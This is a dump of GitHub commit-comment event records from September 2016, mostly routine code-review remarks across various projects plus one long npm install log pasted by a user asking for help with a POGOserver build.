{"id":"4521061197","type":"CommitCommentEvent","actor":{"login":"16164657"},"repo":{"name":"swconquest/swconquest-fix-dialogs"},"payload":{"comment":{"id":18910332,"position":null,"line":null,"path":null,"commit_id":"b9b63dc82f1dae05fe1763c4a6420d728b5e2f99","created_at":"2016-09-06T12:42:42Z","updated_at":"2016-09-06T12:42:42Z","body":"so you made 28 changes, 9 of which were simply grammar mistakes, and the rest completely unneeded, and you manage to spell grammar wrong in the title      wonderful "}},"created_at":"2016-09-06T12:42:42Z"}
{"id":"4521062934","type":"CommitCommentEvent","actor":{"login":"brgillis"},"repo":{"name":"GalSim-developers/GalSim"},"payload":{"comment":{"id":18910337,"position":73,"line":338,"path":"examples/demo9.py","commit_id":"a6d982227f59e22a7add261e686c4b3579b368fb","created_at":"2016-09-06T12:43:04Z","updated_at":"2016-09-06T12:43:04Z","body":"Ah yes, you're correct here. I was getting the angles mixed up - theta is the one that should be uniform (as it indeed is) - so this is fine."}},"created_at":"2016-09-06T12:43:04Z"}
{"id":"4521063826","type":"CommitCommentEvent","actor":{"login":"tbazant"},"repo":{"name":"SUSE/doc-ses"},"payload":{"comment":{"id":18910340,"position":null,"line":null,"path":null,"commit_id":"63d80430bd0e3fe3918e358a540761c6c5119ce4","created_at":"2016-09-06T12:43:16Z","updated_at":"2016-09-06T12:43:16Z","body":"<a href=\"https:&#x2F;&#x2F;trello.com&#x2F;c&#x2F;Fi64BUZ7&#x2F;1932-bug-995561-doc-osd-partition-guid-codes-need-clarification\"><img src=\"https:&#x2F;&#x2F;github.trello.services&#x2F;images&#x2F;trello-icon.png\" width=\"12\" height=\"12\"> Bug 995561 - [doc] OSD partition GUID codes need clarification</a>"}},"created_at":"2016-09-06T12:43:16Z"}
{"id":"4521067986","type":"CommitCommentEvent","actor":{"login":"mackaypeter"},"repo":{"name":"jirka007/results-checker"},"payload":{"comment":{"id":18910352,"position":24,"line":24,"path":"src/main/java/org/jboss/qe/collector/Cache.java","commit_id":"db5ef7c9c335e09173c0b535c720d84dc7dc09dc","created_at":"2016-09-06T12:44:11Z","updated_at":"2016-09-06T12:44:11Z","body":"Use the finally block or even better the try-with-resources statement to close open resources. If you get an IOException during the write, then the stream won't get closed."}},"created_at":"2016-09-06T12:44:11Z"}
{"id":"4521068689","type":"CommitCommentEvent","actor":{"login":"royrwood"},"repo":{"name":"h2database/h2database"},"payload":{"comment":{"id":18910353,"position":null,"line":null,"path":null,"commit_id":"5b8374a2a9ef74aaab5a9b156bceee30cc7bfb48","created_at":"2016-09-06T12:44:19Z","updated_at":"2016-09-06T12:44:19Z","body":"@svladykin I use H2 for unit testing, with Postgres as the production database.  Some of my Postgres tables have UUID columns, and I'd like to be able to use H2 for testing interaction with the code that handles those tables/columns in Postgres (just the usual SELECT and INSERT stuff-- nothing too unusual).\r\n\r\nRight now, for example, H2 throws an exception when I try to access a UUID column, since my code is passing the UUID as a JAVA_OBJECT.  I would like to add support in H2 for accepting the UUID as a JAVA_OBJECT.\r\n\r\nI could work around this by passing the uuid as a string and then doing a conversion to uuid within Postgres/H2, but that's a little clumsy.\r\n\r\nSo, I think what I'm looking at doing is modifying the converTo( ) handler in Value.java to accept a JAVA_OBJECT, though I'm not entirely clear on how you guys normally handle that.  So, as mentioned, I will take a look at the other code there and try to be consistent...."}},"created_at":"2016-09-06T12:44:19Z"}
{"id":"4521070332","type":"CommitCommentEvent","actor":{"login":"jayfk"},"repo":{"name":"pydanny/cookiecutter-django"},"payload":{"comment":{"id":18910356,"position":null,"line":null,"path":null,"commit_id":"c5e984cf2365dba59061b930fe5fa14571c25659","created_at":"2016-09-06T12:44:39Z","updated_at":"2016-09-06T12:44:39Z","body":"I think reverting without changing the name is the right thing to do.\r\n\r\nChanging the license was clearly a mistake in the first place."}},"created_at":"2016-09-06T12:44:39Z"}
{"id":"4521072320","type":"CommitCommentEvent","actor":{"login":"DLvalentine"},"repo":{"name":"DLvalentine/GSX"},"payload":{"comment":{"id":18910359,"position":5,"line":76,"path":"GSX.pl","commit_id":"e096d97b337725887947c644e697f06b769ab7bb","created_at":"2016-09-06T12:45:03Z","updated_at":"2016-09-06T12:45:03Z","body":"`2` might be too long to wait. It does stutter a little. See about cutting this to a fraction."}},"created_at":"2016-09-06T12:45:03Z"}
{"id":"4521075331","type":"CommitCommentEvent","actor":{"login":"nastevens"},"repo":{"name":"rust-embedded/meta-rust-bin"},"payload":{"comment":{"id":18910370,"position":42,"line":42,"path":"classes/cargo.bbclass","commit_id":"62d54f25a54831014ef61740f9f33dba4b0b5ffa","created_at":"2016-09-06T12:45:40Z","updated_at":"2016-09-06T12:45:40Z","body":"Definitely! This was only a placeholder so I could get something committed that was working."}},"created_at":"2016-09-06T12:45:40Z"}
{"id":"4521075611","type":"CommitCommentEvent","actor":{"login":"ilcompatibile"},"repo":{"name":"PrestaShop/vatnumber"},"payload":{"comment":{"id":18910371,"position":null,"line":null,"path":null,"commit_id":"3ede786c25aad3b2a53c214cf13b0beee12c7ae1","created_at":"2016-09-06T12:45:43Z","updated_at":"2016-09-06T12:45:43Z","body":"hi, hi have read that this have compatibility to PS 1.5 but if i try to install it i no find nothing .... it is compatible for PS 1.5 ?"}},"created_at":"2016-09-06T12:45:43Z"}
{"id":"4521076137","type":"CommitCommentEvent","actor":{"login":"hvelarde"},"repo":{"name":"csenger/sc.social.like"},"payload":{"comment":{"id":18910374,"position":null,"line":null,"path":null,"commit_id":"ce5f69447a4711148ab1b500e7b0210f2c3fb20e","created_at":"2016-09-06T12:45:50Z","updated_at":"2016-09-06T12:45:50Z","body":"in line 39 we have `safe_unicode(self.context.title),`, do you mind testing if that works to fix this problem so it stays the same?\r\n\r\nI think declaring the encode is not needed as we have the magic comment in there: `# -*- coding: utf-8 -*-`."}},"created_at":"2016-09-06T12:45:50Z"}
{"id":"4521088403","type":"CommitCommentEvent","actor":{"login":"mmusgrov"},"repo":{"name":"jbosstm/ci-report-generator"},"payload":{"comment":{"id":18910393,"position":null,"line":null,"path":null,"commit_id":"06ccebfb50da62f80ecc195657e6f476cf847a92","created_at":"2016-09-06T12:48:23Z","updated_at":"2016-09-06T12:48:23Z","body":"In that case I will back out the change"}},"created_at":"2016-09-06T12:48:23Z"}
{"id":"4521093714","type":"CommitCommentEvent","actor":{"login":"onmyway133"},"repo":{"name":"bakkenbaeck/iOS-playbook"},"payload":{"comment":{"id":18910413,"position":6,"line":12,"path":"README.md","commit_id":"4200bc8e1f7dd192c6abc2dce7cce7f70473969c","created_at":"2016-09-06T12:49:25Z","updated_at":"2016-09-06T12:49:25Z","body":"Is this necessary?"}},"created_at":"2016-09-06T12:49:25Z"}
{"id":"4521094152","type":"CommitCommentEvent","actor":{"login":"sithhell"},"repo":{"name":"STEllAR-GROUP/hpx"},"payload":{"comment":{"id":18910416,"position":null,"line":null,"path":null,"commit_id":"948291e4e796e3331f430e1d888486fce96cbe3e","created_at":"2016-09-06T12:49:29Z","updated_at":"2016-09-06T12:49:29Z","body":"https://github.com/STEllAR-GROUP/hpx/blob/master/hpx/runtime/components/server/runtime_support.hpp#L319\r\n\r\nThis is the suspension point."}},"created_at":"2016-09-06T12:49:29Z"}
{"id":"4521094736","type":"CommitCommentEvent","actor":{"login":"ClemensRobbenhaar"},"repo":{"name":"xwiki-contrib/workflow-publication"},"payload":{"comment":{"id":18910417,"position":253,"line":998,"path":"xwiki-workflow-publication-api/src/main/java/org/xwiki/workflowpublication/internal/DefaultPublicationWorkflow.java","commit_id":"e1063d57e447d19c2d323b78e55c825987fcb485","created_at":"2016-09-06T12:49:36Z","updated_at":"2016-09-06T12:49:36Z","body":"I first need to create a new language variant here; that is why the `duplicate` call comes in.\r\nBut I guess I just need to leave out the `else`, so that after the `if`  the `copyContentsToNewVersion` gets called in both cases - existing document and freshly created translation.\r\nI will give it a try - not sure why I did not do it that way in the first case ... maybe there was a reason, but then I will figure it out in testing "}},"created_at":"2016-09-06T12:49:36Z"}
{"id":"4521101796","type":"CommitCommentEvent","actor":{"login":"Elland"},"repo":{"name":"bakkenbaeck/iOS-playbook"},"payload":{"comment":{"id":18910434,"position":6,"line":12,"path":"README.md","commit_id":"4200bc8e1f7dd192c6abc2dce7cce7f70473969c","created_at":"2016-09-06T12:51:02Z","updated_at":"2016-09-06T12:51:02Z","body":"what do you mean?"}},"created_at":"2016-09-06T12:51:02Z"}
{"id":"4521102764","type":"CommitCommentEvent","actor":{"login":"mmusgrov"},"repo":{"name":"jbosstm/ci-report-generator"},"payload":{"comment":{"id":18910438,"position":null,"line":null,"path":null,"commit_id":"06ccebfb50da62f80ecc195657e6f476cf847a92","created_at":"2016-09-06T12:51:15Z","updated_at":"2016-09-06T12:51:15Z","body":"lol the top commit reverts 06ccebf"}},"created_at":"2016-09-06T12:51:15Z"}
{"id":"4521104123","type":"CommitCommentEvent","actor":{"login":"mflorea"},"repo":{"name":"xwiki/jodconverter"},"payload":{"comment":{"id":18910441,"position":4,"line":53,"path":"jodconverter-core/pom.xml","commit_id":"74b2d7c5598e490b7cb017df82bd92fd66c9cb0b","created_at":"2016-09-06T12:51:30Z","updated_at":"2016-09-06T12:51:30Z","body":"I was worried too, but I could connect to and work with an older version of LibreOffice (5.1). I'll ask someone to try to connect to a 4.x version using the modified jar."}},"created_at":"2016-09-06T12:51:30Z"}
{"id":"4521107271","type":"CommitCommentEvent","actor":{"login":"3lvis"},"repo":{"name":"bakkenbaeck/iOS-playbook"},"payload":{"comment":{"id":18910452,"position":6,"line":12,"path":"README.md","commit_id":"4200bc8e1f7dd192c6abc2dce7cce7f70473969c","created_at":"2016-09-06T12:52:09Z","updated_at":"2016-09-06T12:52:09Z","body":"We agreed on this in our last workshop. Does it look bad?\r\n\r\n>Pull requests\r\n\r\n>We'll have a pull-request buddie. This person will be your backup, as both your code reviewer as well as when you need to take some time off, in which case this person can pick up the project without much problem. Ideally, they should have as much information about the details of the project as you do, so make sure to keep in sync.\r\n\r\n>README\r\n\r\n>We'll include the project owner and project buddie to the README.\r\n\r\n>We agree that the README will have a small description of what the project is about in non-technical language.\r\n\r\nhttps://github.com/bakkenbaeck/iOS-playbook/blob/master/workshops/1.md#readme\r\n"}},"created_at":"2016-09-06T12:52:09Z"}
{"id":"4521108081","type":"CommitCommentEvent","actor":{"login":"robsonpeixoto"},"repo":{"name":"rubyide/vscode-ruby"},"payload":{"comment":{"id":18910453,"position":null,"line":null,"path":null,"commit_id":"951e34dd93ae73a780fa2b4826ab03aaeefdc59d","created_at":"2016-09-06T12:52:18Z","updated_at":"2016-09-06T12:52:18Z","body":"Please, create a git tag to make easier to know the changes"}},"created_at":"2016-09-06T12:52:18Z"}
{"id":"4521110258","type":"CommitCommentEvent","actor":{"login":"icyflame"},"repo":{"name":"metakgp/mfqp-source"},"payload":{"comment":{"id":18910459,"position":null,"line":null,"path":null,"commit_id":"cade1da724aa4e5a9b87ede935274d1a830d8848","created_at":"2016-09-06T12:52:45Z","updated_at":"2016-09-06T12:52:45Z","body":"@athityakumar If you haven't noticed, these commits are already on master in this repo. So, in effect, the changes have been merged. Please follow PR and Review model next time around :)"}},"created_at":"2016-09-06T12:52:45Z"}
{"id":"4521116227","type":"CommitCommentEvent","actor":{"login":"grandinj"},"repo":{"name":"h2database/h2database"},"payload":{"comment":{"id":18910478,"position":null,"line":null,"path":null,"commit_id":"5b8374a2a9ef74aaab5a9b156bceee30cc7bfb48","created_at":"2016-09-06T12:53:59Z","updated_at":"2016-09-06T12:53:59Z","body":"You probably want something similar to the code further down that method:\r\n        case JAVA_OBJECT:\r\n                    Object object = JdbcUtils.deserialize(getBytesNoCopy(), getDataHandler());\r\n                    if (DataType.isGeometry(object)) {\r\n                        return ValueGeometry.getFromGeometry(object);\r\n                    }\r\n\r\nso something like:\r\n        case JAVA_OBJECT:\r\n                    Object object = JdbcUtils.deserialize(getBytesNoCopy(), getDataHandler());\r\n                    if (object instanceof java.util..UUID) {\r\n                        java.util.UUID uuid = (java.util.UUID) object;\r\n                        return ValueUUID.get(object.getMostSignificantBits(), object.getLeastSignificantBits());\r\n                    }\r\nmight work"}},"created_at":"2016-09-06T12:53:59Z"}
{"id":"4521122261","type":"CommitCommentEvent","actor":{"login":"DiamondBoyALS"},"repo":{"name":"OptiDevs/OptiChat"},"payload":{"comment":{"id":18910492,"position":null,"line":null,"path":null,"commit_id":"52fdbad8a14d356e5a1f22bf8c95f66d02163e9e","created_at":"2016-09-06T12:55:13Z","updated_at":"2016-09-06T12:55:13Z","body":"My plan for the next update is to move each command into their own class, also to do a overhaul on the config.yml. By removing action bar, boss bar, and title commands from the config options."}},"created_at":"2016-09-06T12:55:13Z"}
{"id":"4521126177","type":"CommitCommentEvent","actor":{"login":"mrn0p3c"},"repo":{"name":"maierfelix/POGOserver"},"payload":{"comment":{"id":18910498,"position":null,"line":null,"path":null,"commit_id":"2de38e5568de9f29c1e2f175ba92971308c20f78","created_at":"2016-09-06T12:55:58Z","updated_at":"2016-09-06T12:55:58Z","body":"@ajsnake can you help me how to fix error ? "}},"created_at":"2016-09-06T12:55:58Z"}
{"id":"4521126565","type":"CommitCommentEvent","actor":{"login":"mingwandroid"},"repo":{"name":"mingwandroid/conda-build"},"payload":{"comment":{"id":18910499,"position":null,"line":null,"path":null,"commit_id":"f14d2e0e59d0999c89f07746e94cac27fc1a2a30","created_at":"2016-09-06T12:56:03Z","updated_at":"2016-09-06T12:56:03Z","body":"Hey @msarahan, this is hopefully not very controversial .. I had to rebuild some packages that were marked as Public-Domain instead of LGPL just now, this will help to ensure it doesn't happen again."}},"created_at":"2016-09-06T12:56:03Z"}
{"id":"4521127371","type":"CommitCommentEvent","actor":{"login":"WikiaJenkins"},"repo":{"name":"Wikia/design-system"},"payload":{"comment":{"id":18910502,"position":null,"line":null,"path":null,"commit_id":"bc61f6060c86499fa189d35a502d5b1bc113ca19","created_at":"2016-09-06T12:56:13Z","updated_at":"2016-09-06T12:56:13Z","body":"Visual Regression Testing found a difference between new version and the baseline.\nCheck the diffs [here](http://jenkins.wikia-prod:8080/job/design-system-reference-page-pr-check/408/).\nAccept the new baseline [here](http://jenkins.wikia-prod:8080/job/design-system-reference-page-update-baseline/parambuild?branch=XW-1932)."}},"created_at":"2016-09-06T12:56:13Z"}
{"id":"4521128386","type":"CommitCommentEvent","actor":{"login":"mrn0p3c"},"repo":{"name":"maierfelix/POGOserver"},"payload":{"comment":{"id":18910506,"position":null,"line":null,"path":null,"commit_id":"2de38e5568de9f29c1e2f175ba92971308c20f78","created_at":"2016-09-06T12:56:24Z","updated_at":"2016-09-06T12:56:24Z","body":"@Sillyblower i get new error \r\n\r\nlog : \r\n`0 info it worked if it ends with ok\r\n1 verbose cli [ 'C:\\\\Program Files\\\\nodejs\\\\node.exe',\r\n1 verbose cli   'C:\\\\Program Files\\\\nodejs\\\\node_modules\\\\npm\\\\bin\\\\npm-cli.js',\r\n1 verbose cli   'install',\r\n1 verbose cli   'node-protobuf' ]\r\n2 info using npm@3.10.3\r\n3 info using node@v6.5.0\r\n4 silly loadCurrentTree Starting\r\n5 silly install loadCurrentTree\r\n6 silly install readLocalPackageData\r\n7 silly fetchPackageMetaData node-protobuf\r\n8 silly fetchNamedPackageData node-protobuf\r\n9 silly mapToRegistry name node-protobuf\r\n10 silly mapToRegistry using default registry\r\n11 silly mapToRegistry registry https://registry.npmjs.org/\r\n12 silly mapToRegistry data Result {\r\n12 silly mapToRegistry   raw: 'node-protobuf',\r\n12 silly mapToRegistry   scope: null,\r\n12 silly mapToRegistry   escapedName: 'node-protobuf',\r\n12 silly mapToRegistry   name: 'node-protobuf',\r\n12 silly mapToRegistry   rawSpec: '',\r\n12 silly mapToRegistry   spec: 'latest',\r\n12 silly mapToRegistry   type: 'tag' }\r\n13 silly mapToRegistry uri https://registry.npmjs.org/node-protobuf\r\n14 verbose request uri https://registry.npmjs.org/node-protobuf\r\n15 verbose request no auth needed\r\n16 info attempt registry request try #1 at 19:53:32\r\n17 verbose request id eb4da675d5a24cb4\r\n18 verbose etag \"9XHFCEZNIXQA9CDRHIK0647ZY\"\r\n19 http request GET https://registry.npmjs.org/node-protobuf\r\n20 http 304 https://registry.npmjs.org/node-protobuf\r\n21 verbose headers { date: 'Tue, 06 Sep 2016 12:53:35 GMT',\r\n21 verbose headers   via: '1.1 varnish',\r\n21 verbose headers   'cache-control': 'max-age=300',\r\n21 verbose headers   etag: '\"9XHFCEZNIXQA9CDRHIK0647ZY\"',\r\n21 verbose headers   age: '164',\r\n21 verbose headers   connection: 'keep-alive',\r\n21 verbose headers   'x-served-by': 'cache-sin6921-SIN',\r\n21 verbose headers   'x-cache': 'HIT',\r\n21 verbose headers   'x-cache-hits': '1',\r\n21 verbose headers   'x-timer': 'S1473166415.968369,VS0,VE0',\r\n21 verbose headers   vary: 'Accept-Encoding' }\r\n22 silly get cb [ 304,\r\n22 silly get   { date: 'Tue, 06 Sep 2016 12:53:35 GMT',\r\n22 silly get     via: '1.1 varnish',\r\n22 silly get     'cache-control': 'max-age=300',\r\n22 silly get     etag: '\"9XHFCEZNIXQA9CDRHIK0647ZY\"',\r\n22 silly get     age: '164',\r\n22 silly get     connection: 'keep-alive',\r\n22 silly get     'x-served-by': 'cache-sin6921-SIN',\r\n22 silly get     'x-cache': 'HIT',\r\n22 silly get     'x-cache-hits': '1',\r\n22 silly get     'x-timer': 'S1473166415.968369,VS0,VE0',\r\n22 silly get     vary: 'Accept-Encoding' } ]\r\n23 verbose etag https://registry.npmjs.org/node-protobuf from cache\r\n24 verbose get saving node-protobuf to C:\\Users\\codex\\AppData\\Roaming\\npm-cache\\registry.npmjs.org\\node-protobuf\\.cache.json\r\n25 verbose correctMkdir C:\\Users\\codex\\AppData\\Roaming\\npm-cache correctMkdir not in flight; initializing\r\n26 silly install normalizeTree\r\n27 silly loadCurrentTree Finishing\r\n28 silly loadIdealTree Starting\r\n29 silly install loadIdealTree\r\n30 silly cloneCurrentTree Starting\r\n31 silly install cloneCurrentTreeToIdealTree\r\n32 silly cloneCurrentTree Finishing\r\n33 silly loadShrinkwrap Starting\r\n34 silly install loadShrinkwrap\r\n35 silly loadShrinkwrap Finishing\r\n36 silly loadAllDepsIntoIdealTree Starting\r\n37 silly install loadAllDepsIntoIdealTree\r\n38 silly resolveWithNewModule node-protobuf@1.3.3 checking installable status\r\n39 silly cache add args [ 'node-protobuf', null ]\r\n40 verbose cache add spec node-protobuf\r\n41 silly cache add parsed spec Result {\r\n41 silly cache add   raw: 'node-protobuf',\r\n41 silly cache add   scope: null,\r\n41 silly cache add   escapedName: 'node-protobuf',\r\n41 silly cache add   name: 'node-protobuf',\r\n41 silly cache add   rawSpec: '',\r\n41 silly cache add   spec: 'latest',\r\n41 silly cache add   type: 'tag' }\r\n42 silly addNamed node-protobuf@latest\r\n43 verbose addNamed \"latest\" is being treated as a dist-tag for node-protobuf\r\n44 info addNameTag [ 'node-protobuf', 'latest' ]\r\n45 silly mapToRegistry name node-protobuf\r\n46 silly mapToRegistry using default registry\r\n47 silly mapToRegistry registry https://registry.npmjs.org/\r\n48 silly mapToRegistry data Result {\r\n48 silly mapToRegistry   raw: 'node-protobuf',\r\n48 silly mapToRegistry   scope: null,\r\n48 silly mapToRegistry   escapedName: 'node-protobuf',\r\n48 silly mapToRegistry   name: 'node-protobuf',\r\n48 silly mapToRegistry   rawSpec: '',\r\n48 silly mapToRegistry   spec: 'latest',\r\n48 silly mapToRegistry   type: 'tag' }\r\n49 silly mapToRegistry uri https://registry.npmjs.org/node-protobuf\r\n50 verbose addNameTag registry:https://registry.npmjs.org/node-protobuf not in flight; fetching\r\n51 verbose get https://registry.npmjs.org/node-protobuf not expired, no request\r\n52 silly addNameTag next cb for node-protobuf with tag latest\r\n53 silly addNamed node-protobuf@1.3.3\r\n54 verbose addNamed \"1.3.3\" is a plain semver version for node-protobuf\r\n55 silly cache afterAdd node-protobuf@1.3.3\r\n56 verbose afterAdd C:\\Users\\codex\\AppData\\Roaming\\npm-cache\\node-protobuf\\1.3.3\\package\\package.json not in flight; writing\r\n57 verbose correctMkdir C:\\Users\\codex\\AppData\\Roaming\\npm-cache correctMkdir not in flight; initializing\r\n58 verbose afterAdd C:\\Users\\codex\\AppData\\Roaming\\npm-cache\\node-protobuf\\1.3.3\\package\\package.json written\r\n59 silly fetchNamedPackageData bindings\r\n60 silly mapToRegistry name bindings\r\n61 silly mapToRegistry using default registry\r\n62 silly mapToRegistry registry https://registry.npmjs.org/\r\n63 silly mapToRegistry data Result {\r\n63 silly mapToRegistry   raw: 'bindings',\r\n63 silly mapToRegistry   scope: null,\r\n63 silly mapToRegistry   escapedName: 'bindings',\r\n63 silly mapToRegistry   name: 'bindings',\r\n63 silly mapToRegistry   rawSpec: '',\r\n63 silly mapToRegistry   spec: 'latest',\r\n63 silly mapToRegistry   type: 'tag' }\r\n64 silly mapToRegistry uri https://registry.npmjs.org/bindings\r\n65 verbose request uri https://registry.npmjs.org/bindings\r\n66 verbose request no auth needed\r\n67 info attempt registry request try #1 at 19:53:34\r\n68 verbose etag \"33TX4J3DNTGF7K41ZUV6OA182\"\r\n69 http request GET https://registry.npmjs.org/bindings\r\n70 http 304 https://registry.npmjs.org/bindings\r\n71 verbose headers { date: 'Tue, 06 Sep 2016 12:53:37 GMT',\r\n71 verbose headers   via: '1.1 varnish',\r\n71 verbose headers   'cache-control': 'max-age=300',\r\n71 verbose headers   etag: '\"33TX4J3DNTGF7K41ZUV6OA182\"',\r\n71 verbose headers   age: '100',\r\n71 verbose headers   connection: 'keep-alive',\r\n71 verbose headers   'x-served-by': 'cache-sin6921-SIN',\r\n71 verbose headers   'x-cache': 'HIT',\r\n71 verbose headers   'x-cache-hits': '3',\r\n71 verbose headers   'x-timer': 'S1473166417.785751,VS0,VE0',\r\n71 verbose headers   vary: 'Accept-Encoding' }\r\n72 silly get cb [ 304,\r\n72 silly get   { date: 'Tue, 06 Sep 2016 12:53:37 GMT',\r\n72 silly get     via: '1.1 varnish',\r\n72 silly get     'cache-control': 'max-age=300',\r\n72 silly get     etag: '\"33TX4J3DNTGF7K41ZUV6OA182\"',\r\n72 silly get     age: '100',\r\n72 silly get     connection: 'keep-alive',\r\n72 silly get     'x-served-by': 'cache-sin6921-SIN',\r\n72 silly get     'x-cache': 'HIT',\r\n72 silly get     'x-cache-hits': '3',\r\n72 silly get     'x-timer': 'S1473166417.785751,VS0,VE0',\r\n72 silly get     vary: 'Accept-Encoding' } ]\r\n73 verbose etag https://registry.npmjs.org/bindings from cache\r\n74 verbose get saving bindings to C:\\Users\\codex\\AppData\\Roaming\\npm-cache\\registry.npmjs.org\\bindings\\.cache.json\r\n75 verbose correctMkdir C:\\Users\\codex\\AppData\\Roaming\\npm-cache correctMkdir not in flight; initializing\r\n76 silly resolveWithNewModule bindings@1.2.1 checking installable status\r\n77 silly cache add args [ 'bindings@^1.2.1', null ]\r\n78 verbose cache add spec bindings@^1.2.1\r\n79 silly cache add parsed spec Result {\r\n79 silly cache add   raw: 'bindings@^1.2.1',\r\n79 silly cache add   scope: null,\r\n79 silly cache add   escapedName: 'bindings',\r\n79 silly cache add   name: 'bindings',\r\n79 silly cache add   rawSpec: '^1.2.1',\r\n79 silly cache add   spec: '>=1.2.1 <2.0.0',\r\n79 silly cache add   type: 'range' }\r\n80 silly addNamed bindings@>=1.2.1 <2.0.0\r\n81 verbose addNamed \">=1.2.1 <2.0.0\" is a valid semver range for bindings\r\n82 silly addNameRange { name: 'bindings', range: '>=1.2.1 <2.0.0', hasData: false }\r\n83 silly mapToRegistry name bindings\r\n84 silly mapToRegistry using default registry\r\n85 silly mapToRegistry registry https://registry.npmjs.org/\r\n86 silly mapToRegistry data Result {\r\n86 silly mapToRegistry   raw: 'bindings',\r\n86 silly mapToRegistry   scope: null,\r\n86 silly mapToRegistry   escapedName: 'bindings',\r\n86 silly mapToRegistry   name: 'bindings',\r\n86 silly mapToRegistry   rawSpec: '',\r\n86 silly mapToRegistry   spec: 'latest',\r\n86 silly mapToRegistry   type: 'tag' }\r\n87 silly mapToRegistry uri https://registry.npmjs.org/bindings\r\n88 verbose addNameRange registry:https://registry.npmjs.org/bindings not in flight; fetching\r\n89 verbose get https://registry.npmjs.org/bindings not expired, no request\r\n90 silly addNameRange number 2 { name: 'bindings', range: '>=1.2.1 <2.0.0', hasData: true }\r\n91 silly addNameRange versions [ 'bindings',\r\n91 silly addNameRange   [ '0.0.1',\r\n91 silly addNameRange     '0.1.0',\r\n91 silly addNameRange     '0.1.1',\r\n91 silly addNameRange     '0.2.0',\r\n91 silly addNameRange     '0.2.1',\r\n91 silly addNameRange     '0.2.2',\r\n91 silly addNameRange     '0.2.3',\r\n91 silly addNameRange     '0.2.4',\r\n91 silly addNameRange     '0.3.0',\r\n91 silly addNameRange     '0.4.0',\r\n91 silly addNameRange     '1.0.0',\r\n91 silly addNameRange     '1.1.0',\r\n91 silly addNameRange     '1.1.1',\r\n91 silly addNameRange     '1.2.0',\r\n91 silly addNameRange     '1.2.1' ] ]\r\n92 silly addNamed bindings@1.2.1\r\n93 verbose addNamed \"1.2.1\" is a plain semver version for bindings\r\n94 silly cache afterAdd bindings@1.2.1\r\n95 verbose afterAdd C:\\Users\\codex\\AppData\\Roaming\\npm-cache\\bindings\\1.2.1\\package\\package.json not in flight; writing\r\n96 verbose correctMkdir C:\\Users\\codex\\AppData\\Roaming\\npm-cache correctMkdir not in flight; initializing\r\n97 verbose afterAdd C:\\Users\\codex\\AppData\\Roaming\\npm-cache\\bindings\\1.2.1\\package\\package.json written\r\n98 silly fetchNamedPackageData fsevents\r\n99 silly mapToRegistry name fsevents\r\n100 silly mapToRegistry using default registry\r\n101 silly mapToRegistry registry https://registry.npmjs.org/\r\n102 silly mapToRegistry data Result {\r\n102 silly mapToRegistry   raw: 'fsevents',\r\n102 silly mapToRegistry   scope: null,\r\n102 silly mapToRegistry   escapedName: 'fsevents',\r\n102 silly mapToRegistry   name: 'fsevents',\r\n102 silly mapToRegistry   rawSpec: '',\r\n102 silly mapToRegistry   spec: 'latest',\r\n102 silly mapToRegistry   type: 'tag' }\r\n103 silly mapToRegistry uri https://registry.npmjs.org/fsevents\r\n104 verbose request uri https://registry.npmjs.org/fsevents\r\n105 verbose request no auth needed\r\n106 info attempt registry request try #1 at 19:53:35\r\n107 verbose etag \"69O0UF1UA8LG7BQRJME2P5RBR\"\r\n108 http request GET https://registry.npmjs.org/fsevents\r\n109 http 304 https://registry.npmjs.org/fsevents\r\n110 verbose headers { date: 'Tue, 06 Sep 2016 12:53:38 GMT',\r\n110 verbose headers   via: '1.1 varnish',\r\n110 verbose headers   'cache-control': 'max-age=300',\r\n110 verbose headers   etag: '\"69O0UF1UA8LG7BQRJME2P5RBR\"',\r\n110 verbose headers   age: '166',\r\n110 verbose headers   connection: 'keep-alive',\r\n110 verbose headers   'x-served-by': 'cache-sin6921-SIN',\r\n110 verbose headers   'x-cache': 'HIT',\r\n110 verbose headers   'x-cache-hits': '254',\r\n110 verbose headers   'x-timer': 'S1473166418.944230,VS0,VE0',\r\n110 verbose headers   vary: 'Accept-Encoding' }\r\n111 silly get cb [ 304,\r\n111 silly get   { date: 'Tue, 06 Sep 2016 12:53:38 GMT',\r\n111 silly get     via: '1.1 varnish',\r\n111 silly get     'cache-control': 'max-age=300',\r\n111 silly get     etag: '\"69O0UF1UA8LG7BQRJME2P5RBR\"',\r\n111 silly get     age: '166',\r\n111 silly get     connection: 'keep-alive',\r\n111 silly get     'x-served-by': 'cache-sin6921-SIN',\r\n111 silly get     'x-cache': 'HIT',\r\n111 silly get     'x-cache-hits': '254',\r\n111 silly get     'x-timer': 'S1473166418.944230,VS0,VE0',\r\n111 silly get     vary: 'Accept-Encoding' } ]\r\n112 verbose etag https://registry.npmjs.org/fsevents from cache\r\n113 verbose get saving fsevents to C:\\Users\\codex\\AppData\\Roaming\\npm-cache\\registry.npmjs.org\\fsevents\\.cache.json\r\n114 verbose correctMkdir C:\\Users\\codex\\AppData\\Roaming\\npm-cache correctMkdir not in flight; initializing\r\n115 silly resolveWithNewModule fsevents@1.0.14 checking installable status\r\n116 silly loadAllDepsIntoIdealTree Finishing\r\n117 silly loadIdealTree Finishing\r\n118 silly currentTree POGOServer@0.5.5\r\n118 silly currentTree +-- abbrev@1.0.9\r\n118 silly currentTree +-- amdefine@1.0.0\r\n118 silly currentTree +-- ansi-regex@2.0.0\r\n118 silly currentTree +-- ansi-styles@2.2.1\r\n118 silly currentTree +-- anymatch@1.3.0\r\n118 silly currentTree +-- aproba@1.0.4\r\n118 silly currentTree +-- are-we-there-yet@1.1.2\r\n118 silly currentTree +-- arr-diff@2.0.0\r\n118 silly currentTree +-- arr-flatten@1.0.1\r\n118 silly currentTree +-- array-find-index@1.0.1\r\n118 silly currentTree +-- array-index@1.0.0\r\n118 silly currentTree +-- array-uniq@1.0.3\r\n118 silly currentTree +-- array-unique@0.2.1\r\n118 silly currentTree +-- arrify@1.0.1\r\n118 silly currentTree +-- asap@2.0.4\r\n118 silly currentTree +-- ascli@1.0.0\r\n118 silly currentTree +-- asn1@0.2.3\r\n118 silly currentTree +-- assert-plus@0.2.0\r\n118 silly currentTree +-- async-each@1.0.1\r\n118 silly currentTree +-- async@1.5.2\r\n118 silly currentTree +-- aws-sign2@0.6.0\r\n118 silly currentTree +-- aws4@1.4.1\r\n118 silly currentTree +-- babel-cli@6.14.0\r\n118 silly currentTree +-- babel-code-frame@6.11.0\r\n118 silly currentTree +-- babel-core@6.14.0\r\n118 silly currentTree +-- babel-generator@6.14.0\r\n118 silly currentTree +-- babel-helper-bindify-decorators@6.8.0\r\n118 silly currentTree +-- babel-helper-builder-binary-assignment-operator-visitor@6.8.0\r\n118 silly currentTree +-- 